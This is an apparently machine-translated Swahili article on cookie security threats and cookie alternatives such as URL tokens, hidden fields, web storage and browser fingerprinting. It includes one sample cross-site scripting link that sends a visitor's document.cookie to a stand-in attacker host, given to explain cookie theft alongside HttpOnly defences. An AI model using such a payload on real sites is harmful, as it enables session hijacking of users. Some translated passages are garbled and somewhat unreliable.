Vidakuzi vinaweza kuibiwa kupitia pakiti ya kunusa katika shambulio linaloitwa utekaji nyara wa kikao. Trafiki kwenye wavu inaweza kuzuiwa na kusomwa na kompyuta mbali na zile zinazotuma na kupokea (hasa kwenye nafasi ya umma ambayo haijasimbwa kwa Wi-Fi). Trafiki hii inajumuisha vidakuzi vinavyotumwa kwa vipindi kwa kutumia itifaki ya HTTP isiyo na maana. Wakati trafiki ya mtandao haijasimbwa, watumiaji hasidi wanaweza kusoma mawasiliano ya watumiaji wengine kwenye mtandao kwa kutumia "vinusa pakiti".

Tatizo hili linaweza kutatuliwa kwa kusimba muunganisho kati ya kompyuta ya mtumiaji na seva kwa kutumia itifaki ya HTTPS. Seva inaweza kubainisha a bendera salama wakati wa kuweka kuki; kivinjari kitaituma tu kwa njia salama, kama vile muunganisho wa SSL.

Hata hivyo tovuti nyingi, ingawa zinatumia mawasiliano yaliyosimbwa kwa HTTPS kwa uthibitishaji wa mtumiaji (yaani ukurasa wa kuingia), baadaye hutuma vidakuzi vya kipindi na data nyingine kama kawaida, kupitia miunganisho ya HTTP ambayo haijasimbwa kwa sababu za ufanisi. Kwa hivyo, wavamizi wanaweza kuingilia vidakuzi vya watumiaji wengine na kuiga kwenye tovuti zinazofaa au kuzitumia katika mashambulizi ya vidakuzi.

Kuandika hati kwenye tovuti: kidakuzi ambacho kinapaswa kubadilishwa kati ya seva na mteja pekee kinatumwa kwa mtu mwingine.

Njia nyingine ya kuiba vidakuzi ni kuandika tovuti na kivinjari chenyewe kutuma vidakuzi kwa seva hasidi ambazo hazipokei kamwe. Vivinjari vya kisasa huruhusu utekelezaji wa sehemu zinazotafutwa za msimbo kutoka kwa seva. Ikiwa vidakuzi vinafikiwa wakati wa utekelezaji, thamani zao zinaweza kuwasilishwa kwa njia fulani kwa seva ambazo hazipaswi kuzifikia. Kusimba vidakuzi kabla ya kutumwa kupitia mtandao hakusaidii kuzuia shambulio hilo.

Aina hii ya uandishi wa ndani ya tovuti kwa kawaida huajiriwa na wavamizi kwenye tovuti zinazoruhusu watumiaji kuchapisha maudhui ya HTML. Kwa kuunganisha sehemu ya msimbo unaooana katika mchango wa HTML, mshambulizi anaweza kupokea vidakuzi kutoka kwa watumiaji wengine. Ujuzi wa vidakuzi hivi unaweza kutumika kwa kuunganisha kwenye tovuti hiyo hiyo kwa kutumia vidakuzi vilivyoibiwa, hivyo basi kutambuliwa kama mtumiaji ambaye vidakuzi viliibiwa.

Njia moja ya kuzuia mashambulizi hayo ni kutumia bendera ya HttpOnly; ni chaguo, lililoanzishwa tangu toleo la 6 la Internet Explorer katika PHP tangu toleo la 5.2.0 ambalo limepangwa kufanya kidakuzi kisifikiwe na mteja karibu na hati. Hata hivyo, wasanidi wa wavuti wanapaswa kuzingatia hili katika ukuzaji wa tovuti yao ili wawe na kinga dhidi ya uandishi kwenye tovuti.

Tishio lingine la usalama linalotumika ni uundaji wa mahitaji kwenye tovuti.

Uainisho rasmi wa kiufundi huruhusu vidakuzi kurejeshwa kwa seva tu katika kikoa zilikotoka. Hata hivyo, thamani ya vidakuzi inaweza kutumwa kwa seva zingine kwa kutumia njia zingine isipokuwa vichwa vya vidakuzi.

Hasa, lugha za uandishi kama JavaScript kwa ujumla zinaruhusiwa kufikia thamani za vidakuzi na zina uwezo wa kutuma thamani kiholela kwa seva yoyote kwenye Mtandao. Uwezo huu wa uandishi unatumika kutoka kwa tovuti kuruhusu watumiaji kuchapisha maudhui ya HTML ili watumiaji wengine waweze kutazama.

Kwa mfano, mshambulizi anayefanya kazi kwenye kikoa cha example.com anaweza kuchapisha maoni yaliyo na kiungo kifuatacho kinachoelekeza kwenye blogu maarufu ambayo haidhibiti:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Mtumiaji mwingine anapobofya kiungo hiki, kivinjari hutekeleza sehemu ya sifa ya kubofya kwenye msimbo, kwa hivyo hubadilisha mfuatano wa document.cookie na orodha ya vidakuzi vya mtumiaji vinavyotumika kwa ukurasa huu. Kwa hivyo, orodha hii ya vidakuzi hutumwa kwa seva ya example.com, na kwa hivyo mshambuliaji anaweza kukusanya vidakuzi vya mtumiaji huyu.

Aina hii ya shambulio ni ngumu kugundua kwa upande wa mtumiaji kwa sababu hati inatoka kwa kikoa sawa na kilichoweka kidakuzi, na operesheni ya kutuma thamani inaonekana kuidhinishwa na kikoa hicho. Inachukuliwa kuwa ni wajibu wa wasimamizi wanaoendesha aina hii ya tovuti kuweka vikwazo vinavyozuia uchapishaji wa msimbo mbaya.

Vidakuzi hazionekani moja kwa moja kwa programu za upande wa mteja kama JavaScript ikiwa zilitumwa na bendera ya HttpOnly. Kwa mtazamo wa seva, tofauti pekee ni kwamba kwenye safu ya kichwa cha Set-Cookie kunaongezwa uwanja mpya ulio na kamba HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Wakati kivinjari kinapokea kidakuzi kama hicho, kinapaswa kukitumia kawaida katika ubadilishanaji wa HTTP ufuatao, lakini bila kuifanya ionekane kwa hati zinazotekelezwa kwa upande wa mteja. Bendera ya HttpOnly si sehemu ya maelezo yoyote rasmi ya kiufundi, na haitekelezwi katika vivinjari vyote. Kumbuka kuwa kwa sasa hakuna njia ya kuzuia usomaji na uandishi wa vidakuzi vya kipindi kwa mbinu ya XMLHTTPRequest.

Marekebisho ya maudhui: mshambulizi hutuma kidakuzi batili kwa seva, ambacho kinawezekana kimetengenezwa kutoka kwa kidakuzi halali kilichotumwa na seva.

Kubadilisha vidakuzi

Mara tu vidakuzi vinahitaji kuhifadhiwa na kurejeshwa bila kubadilika kwa seva, mshambulizi anaweza kurekebisha thamani ya vidakuzi kabla ya kurejeshwa kwa seva. Kwa mfano, ikiwa kidakuzi kina jumla ya thamani ambayo mtumiaji anapaswa kulipia kwa bidhaa zilizowekwa kwenye kikapu cha duka, kubadilisha thamani hii huweka seva kwenye hatari ya kumtoza mshambulizi chini ya bei ya kuanzia. Mchakato wa kurekebisha thamani ya vidakuzi huitwa sumu ya kuki na inaweza kutumika baada ya wizi wa kuki ili kufanya shambulio liendelee.

Katika mbinu ya kubatilisha kidakuzi, mshambulizi anatumia hitilafu ya kivinjari kutuma kidakuzi batili kwa seva.

Tovuti nyingi, hata hivyo, huhifadhi kitambulisho cha kipindi pekee - nambari ya kipekee iliyoundwa kwa nasibu inayotumiwa kutambua mtumiaji wa kipindi - kwenye kidakuzi chenyewe, huku maelezo mengine yote yakihifadhiwa kwenye seva. Katika kesi hii, tatizo hili linatatuliwa kwa kiasi kikubwa.

Ushughulikiaji wa vidakuzi kati ya tovuti

Kila tovuti inatarajiwa kuwa na vidakuzi vyake, kwa hivyo tovuti moja haipaswi kuwa na uwezo wa kurekebisha au kuunda vidakuzi vinavyohusishwa na tovuti nyingine. Hitilafu ya usalama ya kivinjari inaweza kuruhusu tovuti hasidi kuvunja sheria hii. Unyonyaji wa dosari kama hiyo inajulikana kama kupikia kwenye tovuti. Madhumuni ya mashambulizi kama haya yanaweza kuwa wizi wa kitambulisho cha kipindi.

Watumiaji wanapaswa kutumia matoleo ya hivi punde ya vivinjari vya wavuti ambamo udhaifu huu karibu umeondolewa.

Hali ya mgongano kati ya mteja na seva

Matumizi ya vidakuzi yanaweza kuleta mkanganyiko kati ya hali ya mteja na hali iliyohifadhiwa kwenye kuki. Ikiwa mtumiaji atapata kidakuzi na kubofya kitufe cha "Nyuma" cha kivinjari, hali ya kivinjari kwa ujumla si sawa na kabla ya upataji huu. Kwa mfano, ikiwa kikapu cha duka la mtandaoni kimeundwa kwa kutumia vidakuzi, yaliyomo kwenye kikapu hayawezi kubadilika wakati mtumiaji anarudi kwenye historia ya kivinjari: ikiwa mtumiaji anabonyeza kitufe ili kuongeza makala kwenye kikapu chake na kubofya "Rudisha". "kifungo, kifungu kinabaki katika hii. Hii inaweza kuwa sio nia ya mtumiaji, ambaye kwa hakika anataka kughairi nyongeza ya makala. Hii inaweza kusababisha kutoaminika, kuchanganyikiwa, na mende. Kwa hivyo watengenezaji wavuti wanapaswa kufahamu tatizo hili na kutekeleza hatua za kushughulikia hali kama hizi.

Muda wa kuki unaisha

Vidakuzi vinavyoendelea vimeshutumiwa na wataalamu wa usalama wa faragha kwa kutowekewa muda wa kuisha hivi karibuni, na hivyo kuruhusu tovuti kufuatilia watumiaji na kuunda wasifu wao kwa muda. Kipengele hiki cha vidakuzi pia ni sehemu ya tatizo la utekaji nyara wa kipindi, kwa sababu kidakuzi kinachoendelea kuibiwa kinaweza kutumika kuiga mtumiaji kwa muda mrefu.

Kusoma pia: GFAM: ni akina nani hao? Kwa nini wao (wakati mwingine) wanatisha sana?

Njia mbadala za kuki

Baadhi ya shughuli zinazoweza kufanywa kwa kutumia vidakuzi pia zinaweza kufanywa kwa kutumia mbinu nyingine zinazokwepa vidakuzi au kuunda upya vidakuzi vilivyofutwa, jambo ambalo huzua masuala ya faragha kwa njia ile ile (au wakati mwingine mbaya zaidi kwa sababu haionekani) kuliko vidakuzi.

Anwani ya IP

Watumiaji wanaweza kufuatiliwa na anwani ya IP ya kompyuta inayoita ukurasa. Mbinu hii imekuwa ikipatikana tangu kuanzishwa kwa Mtandao Wote wa Ulimwenguni, kurasa zinapopakuliwa seva inaomba anwani ya IP ya kompyuta inayoendesha kivinjari au proksi, ikiwa hakuna inatumika. Seva inaweza kufuatilia maelezo haya ikiwa kuna vidakuzi vinavyotumika au la. Hata hivyo, anwani hizi kwa kawaida haziaminiki katika kumtambua mtumiaji kuliko vidakuzi kwa sababu kompyuta na proksi zinaweza kushirikiwa na watumiaji wengi, na kompyuta hiyo hiyo inaweza kupokea anwani tofauti ya IP kwenye kila kipindi cha kazi (kama vile c mara nyingi kesi ya miunganisho ya simu) .

Kufuatilia kwa anwani za IP kunaweza kuaminika katika hali fulani, kama vile miunganisho ya broadband ambayo hudumisha anwani sawa ya IP kwa muda mrefu, mradi nguvu imewashwa.

Mifumo mingine kama Tor imeundwa ili kudumisha kutokujulikana kwa Mtandao na kufanya ufuatiliaji kwa anwani ya IP kuwa haiwezekani au kutowezekana.

URL

Mbinu sahihi zaidi inategemea kupachika maelezo katika URL. Sehemu ya kamba ya hoja ya URL ni mbinu moja ambayo kwa kawaida hutumiwa kwa madhumuni haya, lakini sehemu zingine zinaweza kutumika pia. Seva ya Java na mifumo ya kikao cha PHP hutumia njia hii ikiwa vidakuzi hazijawashwa.

Njia hii inahusisha seva ya wavuti inayoongeza maombi ya kamba kwenye viungo vya ukurasa wa wavuti unaoibeba inapotumwa kwa kivinjari. Mtumiaji anapofuata kiungo, kivinjari hurejesha kamba ya hoja iliyoambatishwa kwenye seva.

Mifuatano ya hoja inayotumiwa kwa madhumuni haya na vidakuzi vinafanana sana, vyote vikiwa ni habari iliyochaguliwa kiholela na seva na kurudishwa na kivinjari. Hata hivyo, kuna baadhi ya tofauti: wakati URL iliyo na kamba ya hoja inatumiwa tena, taarifa sawa hutumwa kwa seva. Kwa mfano, ikiwa mapendeleo ya mtumiaji yamesimbwa katika safu ya hoja ya URL na mtumiaji kutuma URL hiyo kwa mtumiaji mwingine kupitia barua pepe, mtumiaji huyo pia ataweza kutumia mapendeleo hayo.

Kwa upande mwingine, mtumiaji anapofikia ukurasa huo mara mbili, hakuna hakikisho kwamba mfuatano huo wa hoja utatumika mara zote mbili. Kwa mfano, ikiwa mtumiaji anatua kwenye ukurasa kutoka kwa ukurasa wa tovuti ya ndani mara ya kwanza na kutua kwenye ukurasa huo huo kutoka ukurasa wa nje mara ya pili, mfuatano wa hoja unaohusiana na ukurasa wa tovuti kwa kawaida huwa tofauti, wakati vidakuzi ni sawa. .

Hasara nyingine za mifuatano ya hoja zinahusiana na usalama: kuweka data ambayo inabainisha kipindi katika mifuatano ya hoja huwezesha au kurahisisha mashambulizi ya kurekebisha kipindi, mashambulizi ya marejeleo ya vitambulishi, na ushujaa mwingine. Kupitisha vitambulisho vya kipindi kama vidakuzi vya HTTP ni salama zaidi.

Sehemu ya fomu iliyofichwa

Njia moja ya ufuatiliaji wa kipindi, inayotumiwa na ASP.NET, ni kutumia fomu za wavuti zilizo na sehemu zilizofichwa. Mbinu hii ni sawa na kutumia mifuatano ya hoja ya URL kubeba taarifa na ina faida na hasara sawa; na ikiwa fomu itachakatwa kwa mbinu ya HTTP GET, sehemu hizo huwa sehemu ya URL ya kivinjari ambacho kitaituma wakati wa kuwasilisha fomu. Lakini fomu nyingi huchakatwa na HTTP POST, ambayo husababisha maelezo ya fomu, ikijumuisha sehemu zilizofichwa, kuongezwa kama ingizo la ziada ambalo si sehemu ya URL wala kidakuzi.

Mbinu hii ina faida mbili kutoka kwa mtazamo wa ufuatiliaji: kwanza, kufuatilia maelezo yaliyowekwa katika msimbo wa chanzo cha HTML na ingizo la POST badala ya URL itamruhusu mtumiaji wa kawaida kuepuka ufuatiliaji huu; pili, habari ya kikao haijakiliwa wakati mtumiaji anakili URL (kuhifadhi ukurasa kwenye diski au kuituma kupitia barua pepe, kwa mfano).

dirisha.jina

Vivinjari vyote vya kawaida vya wavuti vinaweza kuhifadhi kiasi kikubwa cha data (MB 2 hadi 32MB) kupitia JavaScript kwa kutumia kipengele cha window.name cha DOM. Data hii inaweza kutumika badala ya vidakuzi vya kipindi na inatumika pia katika vikoa. Mbinu hiyo inaweza kuunganishwa na vitu vya JSON ili kuhifadhi seti tata ya anuwai za kikao cha mteja.

Upande mbaya ni kwamba kila dirisha tofauti au kichupo kitakuwa na dirisha tupu. wakati wa kuvinjari kwa vichupo (kufunguliwa na mtumiaji) hii inamaanisha kuwa tabo zilizofunguliwa kibinafsi hazitakuwa na jina la dirisha. Zaidi ya hayo, window.name inaweza kutumika kufuatilia wageni katika tovuti mbalimbali ambazo zinaweza kusababisha wasiwasi wa faragha.

Katika baadhi ya vipengele hii inaweza kuwa salama zaidi kuliko vidakuzi, kutokana na kutohusika kwa seva, hivyo kuifanya isiweze kuathiriwa na mashambulizi ya mtandao ya vidakuzi vya kunusa. Hata hivyo, ikiwa hatua maalum zinachukuliwa ili kulinda data, ni hatari kwa mashambulizi zaidi, kwani data inapatikana kupitia tovuti nyingine zilizofunguliwa kwenye dirisha moja.

Uthibitishaji wa HTTP

Itifaki ya HTTP inajumuisha itifaki za msingi za uthibitishaji wa ufikiaji na muhtasari wa uthibitishaji wa ufikiaji, ambao huruhusu ufikiaji wa ukurasa wa wavuti tu wakati mtumiaji ametoa jina la mtumiaji na nenosiri. Ikiwa seva inaomba cheti ili kutoa ufikiaji wa ukurasa wa wavuti, kivinjari kinaiomba kutoka kwa mtumiaji na mara moja kupatikana, kivinjari huihifadhi na kuituma katika maombi yote yanayofuata ya HTTP. Taarifa hii inaweza kutumika kufuatilia mtumiaji.

Kipengee cha ndani kilichoshirikiwa

Ikiwa kivinjari kinajumuisha programu-jalizi ya Adobe Flash Player, basi vitu vya pamoja vya ndani inaweza kutumika kwa madhumuni sawa na vidakuzi. Wanaweza kuwa chaguo la kuvutia kwa watengenezaji wa wavuti kwa sababu:

• kikomo cha ukubwa chaguo-msingi kwa kitu kilichoshirikiwa ndani ni KB 100;
• ukaguzi wa usalama ni tofauti na ukaguzi wa vidakuzi vya mtumiaji (ili vitu vilivyoshirikiwa vya ndani vinaweza kuruhusiwa wakati vidakuzi haviruhusiwi).

Hoja hii ya mwisho, ambayo inatofautisha sera ya usimamizi wa vidakuzi na ile ya vipengee vya ndani vya Adobe vilivyoshirikiwa huibua maswali kuhusu usimamizi wa mtumiaji wa mipangilio yake ya faragha: lazima afahamu kwamba usimamizi wake wa vidakuzi hauna athari kwa usimamizi wa vitu vya ndani vilivyoshirikiwa, na kinyume chake.

Ukosoaji mwingine wa mfumo huu ni kwamba unaweza kutumika tu kupitia programu-jalizi ya Adobe Flash Player ambayo ni ya umiliki na sio kiwango cha wavuti.

Uvumilivu wa upande wa mteja

Baadhi ya vivinjari vya wavuti vinaunga mkono utaratibu wa kudumu unaotegemea hati, ambao unaruhusu ukurasa kuhifadhi habari ndani kwa matumizi ya baadaye. Internet Explorer, kwa mfano, inasaidia taarifa zinazoendelea katika historia ya kivinjari, alamisho, katika umbizo lililohifadhiwa katika XML, au moja kwa moja na ukurasa wa wavuti uliohifadhiwa kwenye diski. Kwa Microsoft Internet Explorer 5, kuna mbinu ya data ya mtumiaji inayopatikana kupitia tabia za DHTML.

W3C ilianzisha katika HTML 5 API mpya ya JavaScript kwa hifadhi ya data ya upande wa mteja inayoitwa Hifadhi ya Wavuti na ililenga kuchukua nafasi ya vidakuzi kabisa. Ni sawa na vidakuzi lakini kwa uwezo ulioboreshwa sana na bila kuhifadhi habari kwenye kichwa cha maombi ya HTTP. API inaruhusu aina mbili za uhifadhi wa wavuti: uhifadhi wa ndani na uhifadhi wa vipindi, sawa na vidakuzi vinavyoendelea na vidakuzi vya kipindi (isipokuwa kwamba vidakuzi vya kipindi huisha wakati kivinjari kimefungwa wakati uhifadhi wa vipindi inaisha wakati kichupo kimefungwa), mtawaliwa. Hifadhi ya wavuti inatumika na Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 na Opera 10.50.

Utaratibu tofauti kwa kawaida hutegemea uakibishaji wa kivinjari (katika kumbukumbu badala ya kuonyesha upya) kwa kutumia programu za JavaScript katika kurasa za wavuti. 

Kwa mfano, ukurasa unaweza kuwa na lebo . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Kwa wakati huu, programu inabaki kwenye kumbukumbu ya kache na ukurasa uliotembelewa haujapakia tena mara ya pili. Kwa hivyo, ikiwa programu ina mabadiliko ya kimataifa (kwa mfano var id = 3243242;), kitambulishi hiki kinasalia kuwa halali na kinaweza kutumiwa na msimbo mwingine wa JavaScript mara ukurasa unapopakiwa tena, au mara ukurasa unaounganisha programu unapopakiwa. 

Ubaya mkubwa wa njia hii ni kwamba kigeu cha kimataifa cha JavaScript lazima kiwe tuli, kumaanisha hakiwezi kubadilishwa au kufutwa kama kidakuzi.

alama za vidole kwenye kivinjari cha wavuti

Alama ya vidole ya kivinjari ni taarifa iliyokusanywa kuhusu mipangilio ya usanidi wa kivinjari kwa madhumuni ya utambulisho. Alama hizi za vidole zinaweza kutumika kumtambua mtumiaji wa Intaneti au kifaa kikamilifu au kidogo hata wakati vidakuzi vimezimwa.

Maelezo ya kimsingi ya usanidi wa kivinjari cha wavuti kwa muda mrefu yamekusanywa na huduma za hadhira ya tovuti kwa madhumuni ya kupima kwa usahihi trafiki ya watu kwenye wavuti na kugundua aina mbalimbali za ulaghai wa kubofya. Kwa usaidizi wa lugha za uandishi za upande wa mteja, ukusanyaji wa taarifa sahihi zaidi ni sasa inawezekana.

Kubadilisha maelezo haya kuwa kamba kidogo hutoa alama ya kidole ya kifaa. Mnamo mwaka wa 2010, Electronic Frontier Foundation (EFF) ilipima alama ya vidole vya kivinjari kuwa angalau 18,1 bits, na hiyo ilikuwa kabla ya maendeleo katika uwekaji alama za vidole kwenye turubai iliongeza biti 5,7 kwenye entropy hiyo.

Vidakuzi kwa kifupi

Vidakuzi ni faili ndogo za maandishi zilizohifadhiwa na kivinjari cha wavuti kwenye diski kuu ya mgeni wa tovuti na ambazo hutumiwa (miongoni mwa mambo mengine) kurekodi habari kuhusu mgeni au safari yake kupitia tovuti. Kwa hivyo msimamizi wa wavuti anaweza kutambua tabia za mgeni na kubinafsisha uwasilishaji wa tovuti yake kwa kila mgeni; vidakuzi basi hufanya iwezekane kukumbuka ni nakala ngapi za kuonyesha kwenye ukurasa wa nyumbani au hata kuhifadhi kitambulisho cha kuingia kwa chama chochote cha kibinafsi: mgeni anaporudi kwenye wavuti, sio lazima tena kuandika jina na nywila yake. kutambuliwa, kwa kuwa zinasomwa kiotomatiki kwenye kuki.

Kidakuzi kina muda mdogo wa kuishi, uliowekwa na mbunifu wa tovuti. Wanaweza pia kumalizika mwishoni mwa kikao kwenye tovuti, ambayo inalingana na kufungwa kwa kivinjari. Vidakuzi hutumiwa sana kurahisisha maisha kwa wageni na kuwapa taarifa muhimu zaidi. Lakini mbinu maalum hufanya iwezekanavyo kumfuata mgeni kwenye tovuti kadhaa na hivyo kukusanya na kuangalia habari nyingi sana juu ya tabia zake. Mbinu hii imeyapa matumizi ya vidakuzi sifa kama mbinu ya ufuatiliaji ambayo inakiuka faragha ya wageni, ambayo kwa bahati mbaya inalingana na hali halisi katika hali nyingi za matumizi kwa sababu zisizo za kiufundi au kutoheshimu matarajio ya mtumiaji. .

Kwa kukabiliana na hofu hizi halali, HTML 5 inaleta API mpya ya JavaScript kwa hifadhi ya data ya upande wa mteja inayoitwa Hifadhi ya Wavuti, ambayo ni salama zaidi na yenye uwezo mkubwa zaidi, ambayo inalenga kuchukua nafasi ya vidakuzi.

Uhifadhi wa vidakuzi

Na baadhi ya vivinjari, kidakuzi kinaweza kuhaririwa kwa urahisi, kihariri cha maandishi rahisi kama Notepad kinatosha kubadilisha thamani zake kwa mikono.

Vidakuzi huhifadhiwa kwa njia tofauti kulingana na kivinjari:

• Microsoft Internet Explorer huhifadhi kila kuki katika faili tofauti;
• Mozilla Firefox huhifadhi vidakuzi vyake vyote kwenye faili moja;
• Opera huhifadhi vidakuzi vyake vyote kwenye faili moja na kuzificha (haiwezekani kuzirekebisha isipokuwa katika chaguzi za programu);
• Apple Safari huhifadhi vidakuzi vyake vyote katika faili moja ya kiendelezi ya .plist. Urekebishaji unawezekana lakini sio rahisi sana, isipokuwa ukipitia chaguzi za programu.

Vivinjari vinahitajika kusaidia angalau :

• Vidakuzi 300 vya wakati mmoja;
• 4 o kwa kuki;
• Vidakuzi 20 kwa kila mwenyeji au kikoa.